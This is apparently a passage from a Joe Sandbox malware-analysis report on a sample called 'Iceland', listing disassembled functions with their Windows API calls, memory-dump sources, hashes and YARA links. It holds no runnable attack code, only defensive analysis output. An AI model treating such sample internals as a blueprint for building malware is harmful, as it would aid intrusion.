                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00A55F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00A557E3
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 00A5585E
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 00A55879
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00A5589F
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,00A55F16,00000000,?,?,?,?,?,?,?,?,?,00A55F16,?), ref: 00A558BE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,00A55F16,00000000,?,?,?,?,?,?,?,?,?,00A55F16,?), ref: 00A558F7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                • Opcode ID: 64083f0a6071c6cfa172ea50ef984aec5bd203637d735fb16c70617fc8e6817f
                                                                                                                                                                                                                                                                • Instruction ID: c66c8e5639f996793f7ff9d42749ecfedc827ad6ac5edb86a594568fe15497da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64083f0a6071c6cfa172ea50ef984aec5bd203637d735fb16c70617fc8e6817f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06518E71E00649DFDB10CFA8D895AEEBBF8FF08311F14415AE955E7291E7309945CBA0
                                                                                                                                                                                                                                                                Function 00A43090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A430BB
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00A430C3
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A43151
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00A4317C
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A431D1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: 61576b439f59ad9e431ad2f92eb8bb1c2c6ee5064350a3c03fa139c35298f801
                                                                                                                                                                                                                                                                • Instruction ID: c42b7588051af0af56fd8cde80f9e70cc68208d288250951596092c0d7698a93
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61576b439f59ad9e431ad2f92eb8bb1c2c6ee5064350a3c03fa139c35298f801
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B841B73AE00218ABCF10DF6CC885A9E7BB5BF85324F148255E9156B392D771DB05CB91
                                                                                                                                                                                                                                                                Function 00AA1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AA3AD7
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: _wcslen.LIBCMT ref: 00AA3AF8
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AA1B6F
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1B7E
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1C26
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA1C56
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                • Opcode ID: eecf18ee8da797f494140fa7d8635a0bfff197d8d2fb0b4fced97b73990d75be
                                                                                                                                                                                                                                                                • Instruction ID: f6cf9a6c185a28f1ced764aa65802de2464db02ade2ceb8779bbe072c76b5ee3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eecf18ee8da797f494140fa7d8635a0bfff197d8d2fb0b4fced97b73990d75be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8410831600114AFDB10DF64C944BA9B7E9EF46324F148169FC059B2D2D774ED81CBE1
                                                                                                                                                                                                                                                                Function 00A8D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A8D7CD,?), ref: 00A8E714
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A8D7CD,?), ref: 00A8E72D
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00A8D7F0
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00A8D82A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8D8B0
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8D8C6
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00A8D90C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: 7d4e0eb7780131d6fe4235f7c9a0533a25ccf4ff98a056b4c91d9c4ae87940b0
                                                                                                                                                                                                                                                                • Instruction ID: cb14141f9683dbacb942a34cb80644581d87806e2cf5079787e188dfcc4b37cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d4e0eb7780131d6fe4235f7c9a0533a25ccf4ff98a056b4c91d9c4ae87940b0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D4147719052189FDF16FFA4DA85BDE77B8AF08340F1004EAE545EB192EB34A788CB50
                                                                                                                                                                                                                                                                Function 00AB3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AB38B8
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB38EB
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB3920
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AB3952
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AB397C
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB398D
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB39A7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                • Opcode ID: c4394a867934a3cb45018d1800231d9fc8de67a61a72acdc48bc25e519786f05
                                                                                                                                                                                                                                                                • Instruction ID: 72d0bef6f4e84c8c039f70bd7ec72a0b084d5e4aa363ebea75010572aa2f9ff6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4394a867934a3cb45018d1800231d9fc8de67a61a72acdc48bc25e519786f05
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4311736604255AFDF21CF88DC95FA437E9FB86710F1502A4F5108B2B2CBB1A986DB01
                                                                                                                                                                                                                                                                Function 00A8808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A880D0
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A880F6
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A880F9
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A88117
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A88120
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00A88145
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A88153
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                • Opcode ID: 2e5456a188387cb3392a20730a0a101185fd2b93847875448469b1c3f1033ee1
                                                                                                                                                                                                                                                                • Instruction ID: 5a0591337568f3400b3e6f0da60375fc27cf6f3f5744b4cc5ac62f6cfb015999
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e5456a188387cb3392a20730a0a101185fd2b93847875448469b1c3f1033ee1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E219776600219AF9F10EFA8DC88CBB77ACEF093607448625F905DB2A1DE74DC468760
                                                                                                                                                                                                                                                                Function 00A88164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A881A9
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A881CF
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A881D2
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32 ref: 00A881F3
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 00A881FC
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00A88216
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A88224
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                • Opcode ID: ada9aa909264ff74ac4437f51a1550112ce5d9fd2e30ff99fd9f7ceaf96fc22c
                                                                                                                                                                                                                                                                • Instruction ID: f0173ee8276229855b77cf9333e6a14c886c0c0a09cdc6c9d0d8b92fc3cd7d0a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ada9aa909264ff74ac4437f51a1550112ce5d9fd2e30ff99fd9f7ceaf96fc22c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F214775604504BF9B10EBE8DC89DAAB7ECEB09360B448225F915CB1A1EF74DC42C764
                                                                                                                                                                                                                                                                Function 00A90E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00A90E99
                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A90ED5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                • Opcode ID: 6e9c08619ab72a18644186353720d8446a9e20d31630d21027cd2305b5cd4280
                                                                                                                                                                                                                                                                • Instruction ID: d30a6104fb6f376b92cb1d109e86c42ebaaedb7c26e8b338181a4d8194a8cb2e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e9c08619ab72a18644186353720d8446a9e20d31630d21027cd2305b5cd4280
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E621627160030AAFDF208F69DC48E9A77E8BF547A0F204A59FCA5D71E0E7709941CB50
                                                                                                                                                                                                                                                                Function 00A90F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00A90F6D
                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A90FA8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                • Opcode ID: 4fde8205119a81c13d2bb892a4856de4b5ef14fe5c5d334297afe9c2b8105d29
                                                                                                                                                                                                                                                                • Instruction ID: 30e54c8152d511acb6eea8fe51535ec29ce3b23e5789bd27b3f33396407a3a64
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fde8205119a81c13d2bb892a4856de4b5ef14fe5c5d334297afe9c2b8105d29
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6218C71600346AFDF308F688C44A9A77E8BF55764F200B19F8A1E72E1E7719981DB50
                                                                                                                                                                                                                                                                Function 00AB4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A278B1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: GetStockObject.GDI32(00000011), ref: 00A278C5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A278CF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AB4BB0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AB4BBD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AB4BC8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AB4BD7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AB4BE3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                • Opcode ID: 3a8f864db7ca66633cea35af11f241bf6cbe8c7162149ca443d261278701f445
                                                                                                                                                                                                                                                                • Instruction ID: f7a567df19186f654426cddd00c151e5d8f3fcd6088ad4a107091fd17f87ad8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a8f864db7ca66633cea35af11f241bf6cbe8c7162149ca443d261278701f445
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C1193B1140219BEEF118FA5CC85EEB7F6DEF08798F014110B608A2061CA75DC61DBA0
                                                                                                                                                                                                                                                                Function 00A5DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A5DB23: _free.LIBCMT ref: 00A5DB4C
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DBAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DBB8
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DBC3
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC17
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC22
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC2D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
